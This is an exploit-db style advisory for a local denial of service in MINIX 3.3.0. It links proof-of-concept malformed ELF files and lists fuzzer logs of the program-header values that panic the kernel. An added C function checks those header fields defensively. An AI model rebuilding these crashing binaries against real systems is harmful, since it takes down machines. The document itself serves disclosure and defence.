Mayk0

#; MINIX 3.3.0 Local Denial of Service PoC

Nov 6th, 2014
Full title MINIX 3.3.0 Local Denial of Service PoC
Date add 2014-11-07
Category dos / poc
Platform linux
Risk [Security Risk Medium]

=====================================================

# Exploit Title: MINIX 3.3.0 Local Denial of Service
# Exploit Author: nitr0us
# Vendor Homepage: www.minix3.org
# Software Link: http://www.minix3.org/download/index.html
# Version: 3.3.0
# Tested on: MINIX 3.3.0 x86

Attached three PoCs (malformed ELFs) and a screenshot of the panic.

http://www.exploit-db.com/sploits/35173.zip

----

MINIX 3.3.0 is prone to local kernel panic due to malformed program headers in an ELF executable.
Attached three PoCs that panicked the OS, and their modified fields:

=================================================================================

[+] Malformed ELF: 'orc_0064':

[+] Fuzzing the Program Header Table with 4 entries
(PHT[0]->p_vaddr = 0x08056919, p_paddr = 0xcafed00d) | PHT[0] rule [03] executed
(PHT[0]->p_flags = 0xf0000005) | PHT[0] rule [10] executed
(PHT[0]->p_flags = 0xfff00005) | PHT[0] rule [15] executed
(PHT[3]->p_type = 0x0) | PHT[3] rule [01] executed
(PHT[3]->p_vaddr = 0x1905af52, p_paddr = 0x1905af52) | PHT[3] rule [03] executed
(PHT[3]->p_type = 0x70031337) | PHT[3] rule [06] executed
(PHT[PT_LOAD].p_vaddr reordered [descending]) | PHT rule [20] executed

=================================================================================

[+] Malformed ELF: 'orc_0090':

[+] Fuzzing the Program Header Table with 4 entries
(PHT[0]->p_offset = 0xffff0000) | PHT[0] rule [02] executed
(PHT[3]->p_type = 0x7defaced) | PHT[3] rule [06] executed

=================================================================================

[+] Malformed ELF: 'orc_0092':

[+] Fuzzing the Program Header Table with 4 entries
(PHT[0]->p_filesz = 0x0004fdec, p_memsz = 0x41424344) | PHT[0] rule [04] executed
(PHT[3]->p_type = 0x6fffffff) | PHT[3] rule [14]

=================================================================================
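
A loader-side sanity check over the program header fields the fuzzer log above shows modified (p_offset, p_filesz/p_memsz, p_flags, PT_LOAD ordering), written as an added C example that is not part of the original advisory or of the MINIX source. The advisory does not say which field triggers the panic; the struct, function and enum names, the strict flag policy and the mem_limit cap are assumptions, and the sample entry in main() is constructed.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* ELF32 program header, field order as in the ELF specification. */
typedef struct {
    uint32_t p_type, p_offset, p_vaddr, p_paddr,
             p_filesz, p_memsz, p_flags, p_align;
} phdr32;

#define PT_LOAD  1u
#define PF_KNOWN 0x7u /* PF_X | PF_W | PF_R */
enum { PH_OK, PH_BAD_FLAGS, PH_BAD_RANGE, PH_BAD_SIZE, PH_BAD_MEM, PH_BAD_ORDER };

/* Check every PT_LOAD entry before anything is mapped. file_size is the size
 * of the ELF image; mem_limit is a hypothetical per-segment cap (assumption). */
int check_phdrs(const phdr32 *ph, size_t n, uint32_t file_size, uint32_t mem_limit)
{
    uint32_t prev_end = 0;
    for (size_t i = 0; i < n; i++) {
        const phdr32 *p = &ph[i];
        if (p->p_type != PT_LOAD)
            continue; /* unrecognised types are skipped, never mapped */
        if (p->p_flags & ~PF_KNOWN)
            return PH_BAD_FLAGS; /* strict policy (assumption): no OS/proc bits */
        /* Subtraction form avoids 32-bit wrap in p_offset + p_filesz. */
        if (p->p_offset > file_size || p->p_filesz > file_size - p->p_offset)
            return PH_BAD_RANGE;
        if (p->p_filesz > p->p_memsz)
            return PH_BAD_SIZE;
        if (p->p_memsz > mem_limit || p->p_vaddr > UINT32_MAX - p->p_memsz)
            return PH_BAD_MEM;
        if (p->p_vaddr < prev_end)
            return PH_BAD_ORDER; /* PT_LOAD must ascend without overlap */
        prev_end = p->p_vaddr + p->p_memsz;
    }
    return PH_OK;
}

int main(void)
{
    /* Constructed entry reusing the p_filesz/p_memsz pair logged for orc_0092. */
    phdr32 s = { PT_LOAD, 0, 0x08048000, 0x08048000, 0x0004fdec, 0x41424344, 5, 0x1000 };
    printf("verdict: %d\n", check_phdrs(&s, 1, 0x00060000, 0x10000000));
    return 0;
}
```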